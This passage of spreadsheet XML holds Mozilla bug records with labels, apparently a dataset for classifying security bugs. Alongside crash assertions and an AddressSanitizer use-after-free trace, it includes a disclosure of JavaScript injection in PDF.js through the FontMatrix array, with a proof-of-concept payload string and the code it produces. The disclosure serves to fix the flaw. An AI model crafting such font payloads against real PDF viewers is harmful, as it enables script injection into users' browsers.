          <t>[sg:critical?][dbaron-1.9:Rs]</t>
        </is>
      </c>
      <c r="Q2926" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2926" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2926" t="inlineStr">
        <is>
          <t>mozilla1.9beta2</t>
        </is>
      </c>
      <c r="T2926" t="n">
        <v>1</v>
      </c>
      <c r="U2926" t="n">
        <v>0</v>
      </c>
      <c r="V2926" t="n">
        <v>14</v>
      </c>
      <c r="W2926" t="inlineStr">
        <is>
          <t>Created attachment 280304
testcase
Loading the testcase triggers three assertions:
###!!! ASSERTION: not in child list: 'found', file /Users/jruderman/trunk/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 1767
###!!! ASSERTION: didn't find frame to delete: 'result', file /Users/jruderman/trunk/mozilla/layout/generic/nsAbsoluteContainingBlock.cpp, line 128
###!!! ASSERTION: no placeholder frame for out-of-flow frame: 'Not Reached', file /Users/jruderman/trunk/mozilla/layout/generic/nsFrame.cpp, line 5447
If I try to resize the Firefox window at this point, it often crashes 
[@ nsSpaceManager::CreateFrameInfo] [@ nsIFrame::GetStyleDisplay] dereferencing 0xddddddf5.  This happens most reliably if I launch Firefox with the testcase filename on the command line.</t>
        </is>
      </c>
      <c r="X2926" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2927">
      <c r="A2927" t="n">
        <v>840353</v>
      </c>
      <c r="B2927" t="inlineStr">
        <is>
          <t>2013-02-11 16:39:57 -0800</t>
        </is>
      </c>
      <c r="C2927" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsAsyncDOMEvent::Run</t>
        </is>
      </c>
      <c r="D2927" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2927" t="n">
        <v>1</v>
      </c>
      <c r="F2927" t="n">
        <v>1</v>
      </c>
      <c r="G2927" t="n">
        <v>3</v>
      </c>
      <c r="H2927" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2927" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2927" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2927" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2927" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2927" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2927" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2927" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2927" t="inlineStr">
        <is>
          <t>[asan][adv-main20+][adv-esr1705+] first noted in bug 716140 comment 93</t>
        </is>
      </c>
      <c r="Q2927" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2927" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2927" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T2927" t="n">
        <v>1</v>
      </c>
      <c r="U2927" t="n">
        <v>0</v>
      </c>
      <c r="V2927" t="n">
        <v>25</v>
      </c>
      <c r="W2927" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #835814 +++
Unfortunately this bug still exists after the patch of bug 835814, it just comes up on fewer occasions. (It's also probably harder to create a testcase for.)
Further unfortunately, it blocks my work on bug 716140. I'm getting a build up and running on the record-and-replay box.
&gt;==6846== ERROR: AddressSanitizer: heap-use-after-free on address 0x7f1873a98298 at pc 0x7f18a5b0eb72 bp 0x7fff6a3d1ad0 sp 0x7fff6a3d1ac8
&gt;READ of size 8 at 0x7f1873a98298 thread T0
&gt;    #0 0x7f18a5b0eb71 in nsCOMPtr&lt;nsINodeInfo&gt;::get() const src/../../dist/include/nsCOMPtr.h:764
&gt;    #1 0x7f18a5b0eda9 in nsCOMPtr&lt;nsINodeInfo&gt;::operator-&gt;() const src/../../dist/include/nsCOMPtr.h:784
&gt;    #2 0x7f18a5ab6ff3 in nsINode::OwnerDoc() const src/../../dist/include/nsINode.h:476
&gt;    #3 0x7f18973cc3c0 in nsAsyncDOMEvent::Run() src/content/events/src/nsAsyncDOMEvent.cpp:35
&gt;    #4 0x7f18a477fbdf in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
&gt;    #5 0x7f189205ef95 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
&gt;    #6 0x7f18a259a7dc in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
&gt;    #7 0x7f18945742c2 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
&gt;    #8 0x7f1894573429 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
&gt;    #9 0x7f18945795ae in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
&gt;    #10 0x7f1896aa0f47 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
&gt;    #11 0x7f1895007b35 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:288
&gt;    #12 0x7f189eb04534 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3823
&gt;    #13 0x7f189eb0f92a in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
&gt;    #14 0x7f1891a692b0 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4093
&gt;    #15 0x4520f3 in do_main(int, char**, nsIFile*) src/browser/app/nsBrowserApp.cpp:185
&gt;    #16 0x4d9392 in main src/browser/app/nsBrowserApp.cpp:377
&gt;    #17 0x7f18b37c876c in
&gt;0x7f1873a98298 is located 24 bytes inside of 208-byte region [0x7f1873a98280,0x7f1873a98350)
&gt;freed by thread T0 here:
&gt;    #0 0x40f082 in __interceptor_free
&gt;    #1 0x7f18b47e54b9 in moz_free src/memory/mozalloc/mozalloc.cpp:48
&gt;    #2 0x7f18a02cf830 in operator delete(void*) src/../../../../dist/include/mozilla/mozalloc.h:224
&gt;    #3 0x7f18a02cf830 in mozilla::dom::HTMLImageElement::~HTMLImageElement() src/content/html/content/src/HTMLImageElement.cpp:83
&gt;    #4 0x7f18948851f7 in nsNodeUtils::LastRelease(nsINode*) src/content/base/src/nsNodeUtils.cpp:258
&gt;    #5 0x7f18a045dc10 in mozilla::dom::FragmentOrElement::Release() src/content/base/src/FragmentOrElement.cpp:1685
&gt;    #6 0x7f18a02c7f8a in mozilla::dom::HTMLImageElement::Release() src/content/html/content/src/HTMLImageElement.cpp:89
&gt;    #7 0x7f1895c1fa9f in nsCOMPtr_base::~nsCOMPtr_base() src/objdir-ff-asan-sym/media/webrtc/signaling/signaling_ecc/../../../../dist/include/nsCOMPtr.h:410
&gt;    #8 0x7f18a411c48c in nsCOMPtr&lt;nsINode&gt;::~nsCOMPtr() src/../../dist/include/nsCOMPtr.h:449
&gt;    #9 0x7f18a411c379 in nsCOMPtr&lt;nsINode&gt;::~nsCOMPtr() src/../../dist/include/nsCOMPtr.h:449
&gt;    #10 0x7f18973ce1a7 in nsAsyncDOMEvent::~nsAsyncDOMEvent() src/../../../dist/include/nsAsyncDOMEvent.h:23
&gt;    #11 0x7f189b565ce0 in nsLoadBlockingAsyncDOMEvent::~nsLoadBlockingAsyncDOMEvent() src/content/events/src/nsAsyncDOMEvent.cpp:63
&gt;    #12 0x7f189b565a3f in nsLoadBlockingAsyncDOMEvent::~nsLoadBlockingAsyncDOMEvent() src/content/events/src/nsAsyncDOMEvent.cpp:59
&gt;    #13 0x7f1894468a35 in nsRunnable::Release() src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:31
&gt;    #14 0x7f1895c1fa9f in nsCOMPtr_base::~nsCOMPtr_base() src/objdir-ff-asan-sym/media/webrtc/signaling/signaling_ecc/../../../../dist/include/nsCOMPtr.h:410
&gt;    #15 0x7f18a3e0c58c in nsCOMPtr&lt;nsIRunnable&gt;::~nsCOMPtr() src/../../dist/include/nsCOMPtr.h:449
&gt;    #16 0x7f18a3e0c479 in nsCOMPtr&lt;nsIRunnable&gt;::~nsCOMPtr() src/../../dist/include/nsCOMPtr.h:449
&gt;    #17 0x7f18a477fcdf in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:633
&gt;    #18 0x7f189205ef95 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
&gt;    #19 0x7f18a259a7dc in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
&gt;    #20 0x7f18945742c2 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
&gt;    #21 0x7f1894573429 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
&gt;    #22 0x7f18945795ae in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
&gt;    #23 0x7f1896aa0f47 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
&gt;    #24 0x7f1895007b35 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:288
&gt;    #25 0x7f189eb04534 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3823
&gt;    #26 0x7f189eb0f92a in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
&gt;    #27 0x7f1891a692b0 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4093
&gt;    #28 0x4520f3 in do_main(int, char**, nsIFile*) src/browser/app/nsBrowserApp.cpp:185
&gt;    #29 0x4d9392 in main src/browser/app/nsBrowserApp.cpp:377
&gt;previously allocated by thread T0 here:
&gt;    #0 0x40f162 in __interceptor_malloc
&gt;    #1 0x7f18b47e5604 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
&gt;    #2 0x7f18920c186f in operator new(unsigned long) src/../../../../dist/include/mozilla/mozalloc.h:200
&gt;    #3 0x7f18920c186f in NS_NewHTMLImageElement(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/content/src/HTMLImageElement.cpp:66
&gt;    #4 0x7f18958d8c95 in nsVideoFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) src/layout/generic/nsVideoFrame.cpp:75
&gt;    #5 0x7f18a68218d9 in non-virtual thunk to nsVideoFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) src/layout/generic/nsVideoFrame.cpp:116
&gt;    #6 0x7f189a43bf19 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) src/layout/base/nsCSSFrameConstructor.cpp:3903
&gt;    #7 0x7f189a41c7b6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsIFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) src/layout/base/nsCSSFrameConstructor.cpp:9967
&gt;    #8 0x7f189a49b656 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:3745
&gt;    #9 0x7f189a46d015 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:5542
&gt;    #10 0x7f189a49211b in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsIFrame*, nsFrameItems&amp;) src/layout/base/nsCSSFrameConstructor.cpp:9903
&gt;    #11 0x7f189a4194d6 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) src/layout/base/nsCSSFrameConstructor.cpp:6725
&gt;    #12 0x7f189a4367e8 in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) src/layout/base/nsCSSFrameConstructor.cpp:6380
&gt;    #13 0x7f189a436c61 in nsCSSFrameConstructor::CreateNeededFrames() src/layout/base/nsCSSFrameConstructor.cpp:6405
&gt;    #14 0x7f18a48722c2 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) src/layout/base/nsPresShell.cpp:3867
&gt;    #15 0x7f18a48710d3 in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3757
&gt;    #16 0x7f18942da2cd in nsDocument::FlushPendingNotifications(mozFlushType) src/content/base/src/nsDocument.cpp:6727
&gt;    #17 0x7f1894729766 in nsDocLoader::DocLoaderIsEmpty(bool) src/uriloader/base/nsDocLoader.cpp:729
&gt;    #18 0x7f18947240f5 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:659
&gt;    #19 0x7f18a763055b in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:663
&gt;    #20 0x7f1894823461 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) src/netwerk/base/src/nsLoadGroup.cpp:676
&gt;    #21 0x7f189428efd0 in nsDocument::DoUnblockOnload() src/content/base/src/nsDocument.cpp:7600
&gt;    #22 0x7f1894280a41 in nsDocument::UnblockOnload(bool) src/content/base/src/nsDocument.cpp:7542
&gt;    #23 0x7f18942de953 in nsDocument::DispatchContentLoadedEvents() src/content/base/src/nsDocument.cpp:4408
&gt;    #24 0x7f189a1a3062 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() src/../../../dist/include/nsThreadUtils.h:367
&gt;    #25 0x7f18a477fbdf in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
&gt;Shadow bytes around the buggy address:
&gt;  0x1fe30e753000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe30e753010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x1fe30e753020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x1fe30e753030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe30e753040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;=&gt;0x1fe30e753050: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x1fe30e753060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x1fe30e753070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe30e753080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe30e753090: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x1fe30e7530a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:     fa
&gt;  Heap righ redzone:     fb
&gt;  Freed Heap region:     fd
&gt;  Stack left redzone:    f1
&gt;  Stack mid redzone:     f2
&gt;  Stack right redzone:   f3
&gt;  Stack partial redzone: f4
&gt;  Stack after return:    f5
&gt;  Stack use after scope: f8
&gt;  Global redzone:        f9
&gt;  Global init order:     f6
&gt;  Poisoned by user:      f7
&gt;  ASan internal:         fe
&gt;Stats: 274M malloced (295M for red zones) by 451143 calls
&gt;Stats: 48M realloced by 25728 calls
&gt;Stats: 245M freed by 320606 calls
&gt;Stats: 110M really freed by 202828 calls
&gt;Stats: 492M (492M-0M) mmaped; 123 maps, 0 unmaps
&gt;  mmaps   by size class: 8:294894; 9:40955; 10:12285; 11:14329; 12:4096; 13:1536; 14:1280; 15:384; 16:1216; 17:1312; 18:64; 19:40; 20:24;
&gt;  mallocs by size class: 8:368736; 9:40833; 10:12926; 11:17620; 12:3670; 13:2004; 14:1736; 15:459; 16:1577; 17:1440; 18:77; 19:42; 20:23;
&gt;  frees   by size class: 8:256057; 9:30657; 10:9412; 11:15499; 12:2386; 13:1682; 14:1564; 15:329; 16:1481; 17:1417; 18:63; 19:39; 20:20;
&gt;  rfrees  by size class: 8:175259; 9:10652; 10:2677; 11:10244; 12:779; 13:679; 14:773; 15:177; 16:980; 17:577; 18:26; 19:4; 20:1;
&gt;Stats: malloc large: 1582 small slow: 2700
&gt;Stats: StackDepot: 0 ids; 0M mapped
&gt;==6846== ABORTING
&gt;</t>
        </is>
      </c>
      <c r="X2927" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2928">
      <c r="A2928" t="n">
        <v>1893645</v>
      </c>
      <c r="B2928" t="inlineStr">
        <is>
          <t>2024-04-26 06:35:08 -0700</t>
        </is>
      </c>
      <c r="C2928" t="inlineStr">
        <is>
          <t>Arbitrary Javascript injection in PDF.js through FontMatrix</t>
        </is>
      </c>
      <c r="D2928" t="inlineStr">
        <is>
          <t>2024-09-18 13:54:42 -0700</t>
        </is>
      </c>
      <c r="E2928" t="n">
        <v>1</v>
      </c>
      <c r="F2928" t="n">
        <v>1</v>
      </c>
      <c r="G2928" t="n">
        <v>2</v>
      </c>
      <c r="H2928" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2928" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2928" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K2928" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2928" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2928" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2928" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2928" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2928" t="inlineStr">
        <is>
          <t xml:space="preserve">[reporter-external] [client-bounty-form] [verif?] [adv-main126+] [adv-ESR115.11+] </t>
        </is>
      </c>
      <c r="Q2928" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2928" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2928" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T2928" t="n">
        <v>1</v>
      </c>
      <c r="U2928" t="n">
        <v>0</v>
      </c>
      <c r="V2928" t="n">
        <v>34</v>
      </c>
      <c r="W2928" t="inlineStr">
        <is>
          <t>Created attachment 9398837
js_injection_poc.pdf
(Tested with Firefox 124.0b9 on Ubuntu and with PDF.js latest from Git.)
Arbitrary Javascript code can be executed in the PDF.js context (unrelated to the Javascript sandbox) by abusing a lack of type checking in the glyph path compilation process, specifically when a Type 1 font is involved. A prerequisite is that `isEvalSupported` needs to be true (it is by default).
This results in a somewhat universal XSS when a PDF is opened with Firefox (cross-origin restrictions are still in place). An attacker can control the PDF.js window and do things like spy on the user’s activity, trigger downloads using `pdf.js.message` events (even file:// URLs can be “downloaded” in this way) or leak the PDF’s local file path from `window.PDFViewerApplication.url`.
In the cases where PDF.js is used in a web-application, this leads to a stored XSS attack on the respective page’s origin.
# Details
The method `FontFaceObject.getPathGenerator(...)` compiles glyphs to Javascript functions that will return the associated path. In case `isEvalSupported` is set to true, it does this by concatenating them into a list of Javascript statements and creating a Function object out of that: (https://github.com/mozilla/pdf.js/blob/90d4b9c2c0df7cadbd5c2388431b208f08da1ed6/src/display/font_loader.js#L450 )
```
    // If we can, compile cmds into JS for MAXIMUM SPEED...
    if (this.isEvalSupported &amp;&amp; FeatureTest.isEvalSupported) {
      const jsBuf = [];
      for (const current of cmds) {
        const args = current.args !== undefined ? current.args.join(",") : "";
        jsBuf.push("c.", current.cmd, "(", args, ");\n");
      }
      // eslint-disable-next-line no-new-func
      return (this.compiledGlyphs[character] = new Function(
        "c",
        "size",
        jsBuf.join("")
      ));
    }
```
This list of commands, `cmds`, is generated by the method `CompiledFont.compileGlyph(...)` and the `compileGlyphImpl` variants for the different font types: (trimmed from https://github.com/mozilla/pdf.js/blob/90d4b9c2c0df7cadbd5c2388431b208f08da1ed6/src/core/font_renderer.js#L798 )
```
  compileGlyph(code, glyphId) {
    ...
    let fontMatrix = this.fontMatrix;
    ...
    const cmds = [
      { cmd: "save" },
      { cmd: "transform", args: fontMatrix.slice() },
      { cmd: "scale", args: ["size", "-size"] },
    ];
    this.compileGlyphImpl(code, cmds, glyphId);
    cmds.push({ cmd: "restore" });
    return cmds;
  }
```
For the arguments of the `transform` command it takes the `fontMatrix` array from the current font object. It turns out that under specific circumstances (seemingly only for Type1 fonts) this array is grabbed from a PDF dictionary and not (also) from the font data itself. Hence, the array can contain arbitrary PDF primitives including strings. The retrieval happens in `PartialEvaluator.translateFont`:
```
    const properties = {
      ...
      fontMatrix: dict.getArray("FontMatrix") || FONT_IDENTITY_MATRIX,
      ...
    };
```
(Note: with other font types this does not appear to be a problem as the `FontMatrix` is later grabbed from the font data itself (e.g. CFF dicts or Type1 “PostScript” parsing) where the parsers explicitly expect numeric array elements. Even if it is not present in the font data, it is overwritten with a standard matrix.)
This means that string-type elements get concatenated literally in the resulting Javascript. Hence we can craft a PDF with a Type1 font and a `Font` object with this `FontMatrix` definition;
```
  /FontMatrix [1 2 3 4 5 (6\); alert\('foobar')]
```
resulting in this Javascript code being executed when the glyph is rendered:
```
c.save();
c.transform(1,2,3,4,5,6); alert('foobar');
c.scale(size,-size);
c.moveTo(0,0);
c.restore();
```
Attached is a plain-text minimal PoC.
# Possible solution
Type-validation could be added either in `compileGlyph`, or in `translateFont`. In the latter case, maybe it is beneficial to implement something like `dict.getNumericArray` in addition to `dict.getArray` for situations like this.</t>
        </is>
      </c>
      <c r="X2928" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2929">
      <c r="A2929" t="n">
        <v>1169375</v>
      </c>
      <c r="B2929" t="inlineStr">
        <is>
          <t>2015-05-28 11:32:02 -0700</t>
        </is>
      </c>
      <c r="C2929" t="inlineStr">
        <is>
          <t>Version facet goes to signature report instead of adding term</t>
        </is>
      </c>
      <c r="D2929" t="inlineStr">
        <is>
          <t>2015-06-02 11:34:07 -0700</t>
        </is>
      </c>
      <c r="E2929" t="n">
        <v>1</v>
      </c>
      <c r="F2929" t="n">
        <v>1</v>
      </c>
      <c r="G2929" t="n">
        <v>4</v>
      </c>
      <c r="H2929" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2929" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2929" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2929" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2929" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2929" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2929" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2929" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2929" t="inlineStr"/>
      <c r="Q2929" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2929" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2929" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2929" t="n">
        <v>1</v>
      </c>
      <c r="U2929" t="n">
        <v>0</v>
      </c>
      <c r="V2929" t="n">
        <v>8</v>
      </c>
      <c r="W2929" t="inlineStr">
        <is>
          <t>https://crash-stats.mozilla.com/search/?signature=~e&amp;release_channel=nightly&amp;platform=Windows+NT&amp;product=Firefox&amp;_facets=signature&amp;_facets=build_id&amp;_facets=version&amp;_facets=release_channel&amp;_columns=date&amp;_columns=signature&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform#facet-version
Go to Version tab
Click 41.0a1
Expect: Add term 41.0a1
Actual: Leads to https://crash-stats.mozilla.com/signature/?product=Firefox&amp;platform=Windows+NT&amp;release_channel=nightly&amp;signature=41.0a1&amp;_columns=date&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform&amp;_columns=reason&amp;_columns=address&amp;page=1</t>
        </is>
      </c>
      <c r="X2929" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2930">
      <c r="A2930" t="n">
        <v>1130598</v>
      </c>
      <c r="B2930" t="inlineStr">
        <is>
          <t>2015-02-06 13:51:14 -0800</t>
        </is>
      </c>
      <c r="C2930" t="inlineStr">
        <is>
          <t>simpler defaults for socorro collector+processor</t>
        </is>
      </c>
      <c r="D2930" t="inlineStr">
        <is>
          <t>2015-03-20 13:50:23 -0700</t>
        </is>
      </c>
      <c r="E2930" t="n">
        <v>1</v>
      </c>
      <c r="F2930" t="n">
        <v>1</v>
      </c>
      <c r="G2930" t="n">
        <v>4</v>
      </c>
      <c r="H2930" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2930" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2930" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K2930" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2930" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2930" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2930" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2930" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2930" t="inlineStr"/>
      <c r="Q2930" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2930" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2930" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2930" t="n">
        <v>1</v>
      </c>
      <c r="U2930" t="n">
        <v>0</v>
      </c>
      <c r="V2930" t="n">
        <v>2</v>
      </c>
      <c r="W2930" t="inlineStr">
        <is>
          <t>It would be really nice if basic crash collection+processing Just Worked with only the following (assuming "stackwalker" is on the $PATH, and this is run with an activated socorro virtualenv):
socorro collector &amp;
socorro processor &amp;
So collector+processor would use matching FS storage classes by default, and the FSNewSource instead of RabbitMQ, etc. Queues and additional storage engines we can then think of as optional features that are turned on at runtime.
This makes local testing and low-volume installs dead simple, without really hurting someone who's using PG+ES+S3 etc. since they have a bunch of config options they need to tweak anyway.</t>
        </is>
      </c>
      <c r="X2930" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2931">
      <c r="A2931" t="n">
        <v>9471</v>
      </c>
      <c r="B2931" t="inlineStr">
        <is>
          <t>1999-07-08 17:42:13 -0700</t>
        </is>
      </c>
      <c r="C2931" t="inlineStr">
        <is>
          <t>Box needs scrollbar</t>
        </is>
      </c>
      <c r="D2931" t="inlineStr">
        <is>
          <t>1999-09-21 13:18:23 -0700</t>
        </is>
      </c>
      <c r="E2931" t="n">
        <v>1</v>
      </c>
      <c r="F2931" t="n">
        <v>1</v>
      </c>
      <c r="G2931" t="n">
        <v>3</v>
      </c>
      <c r="H2931" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2931" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2931" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2931" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2931" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2931" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2931" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2931" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2931" t="inlineStr"/>
      <c r="Q2931" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2931" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2931" t="inlineStr">
        <is>
          <t>M11</t>
        </is>
      </c>
      <c r="T2931" t="n">
        <v>1</v>
      </c>
      <c r="U2931" t="n">
        <v>0</v>
      </c>
      <c r="V2931" t="n">
        <v>14</v>
      </c>
      <c r="W2931" t="inlineStr">
        <is>
          <t>Need a scrollbar for the entire scrollbar.</t>
        </is>
      </c>
      <c r="X2931" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2932">
      <c r="A2932" t="n">
        <v>352606</v>
      </c>
      <c r="B2932" t="inlineStr">
        <is>
          <t>2006-09-13 19:32:11 -0700</t>
        </is>
      </c>
      <c r="C2932" t="inlineStr">
        <is>
          <t>Crash [@ js_GetGCThingFlags] involving post-decrement operator</t>
        </is>
      </c>
      <c r="D2932" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E2932" t="n">
        <v>1</v>
      </c>
